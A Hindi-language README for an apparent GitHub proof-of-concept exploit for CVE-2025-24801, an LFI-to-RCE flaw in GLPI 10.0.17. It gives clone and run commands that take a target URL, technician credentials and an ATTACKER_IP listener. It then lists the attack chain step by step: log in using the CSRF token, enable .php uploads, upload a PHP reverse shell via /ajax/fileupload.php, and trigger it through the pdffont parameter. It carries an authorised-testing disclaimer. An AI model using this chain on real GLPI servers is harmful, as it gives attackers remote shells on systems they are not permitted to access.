
CVE-2025-24801 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, GLPI 10.0.17 में LFI-से-RCE भेद्यता। लॉगिन स्वचालित करता है, PHP अपलोड सक्षम करता है, और अधिकृत सुरक्षा परीक्षण के लिए रिवर्स शेल अपलोड करता है।
इस रिपॉजिटरी में एक प्रूफ-ऑफ-कॉन्सेप्ट स्क्रिप्ट (poc.py) है जो CVE-2025-24801 का शोषण करती है, जो GLPI 10.0.17 में एक LFI-से-RCE भेद्यता है। यह स्वचालित करता है:
.php अपलोड सक्षम करनाgit clone https://github.com/fatkz/CVE-2025-24801.git
cd CVE-2025-24801
pip install -r requirements.txt
python3 poc.py \
--url https://target.example.com/glpi \
--user TECHNICIAN_USER \
--password "PASSWORD" \
--lhost ATTACKER_IP \
--lport 4444
--url: GLPI इंस्टेंस का आधार URL (जैसे https://example.com/glpi)--user / --password: वैध GLPI तकनीशियन क्रेडेंशियल्स--lhost / --lport: रिवर्स शेल लिसनर के लिए हमलावर का IP और पोर्टस्क्रिप्ट पहले दस्तावेज़ प्रकार को अपडेट करने के लिए डिफ़ॉल्ट रूप से --doc-id 1 का उपयोग करती है।
निष्पादन के बाद, स्क्रिप्ट निम्नलिखित करेगी:
.php अपलोड सक्षम करेंexploit.php अपलोड करेंफिर आपको RCE प्राप्त करने के लिए PDF फ़ॉन्ट इन्क्लूड में अपलोड की गई फ़ाइल का नाम निर्दिष्ट करके (उदाहरण के लिए, रिपोर्ट एक्सपोर्ट सुविधा के माध्यम से) मैन्युअल रूप से LFI को ट्रिगर करना होगा।
/front/login.php से CSRF टोकन निकालता है और प्रमाणीकरण के लिए क्रेडेंशियल पोस्ट करता है।/front/documenttype.form.php?id=1 प्राप्त करता है, CSRF टोकन पार्स करता है, और अनुमत एक्सटेंशन में php जोड़ता है।/front/ticket.form.php प्राप्त करता है, फिर PHP रिवर्स शेल अपलोड करने के लिए /ajax/fileupload.php (साथ में X-Requested-With: XMLHttpRequest) का उपयोग करता है।pdffont पैरामीटर में अपलोड की गई शेल फ़ाइल का नाम निर्दिष्ट करके PDF फ़ॉन्ट LFI को मैन्युअल रूप से आमंत्रित करें।यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध इसका उपयोग न करें।
शैक्षिक और अधिकृत पेंटेस्टिंग उद्देश्यों के लिए बनाया गया।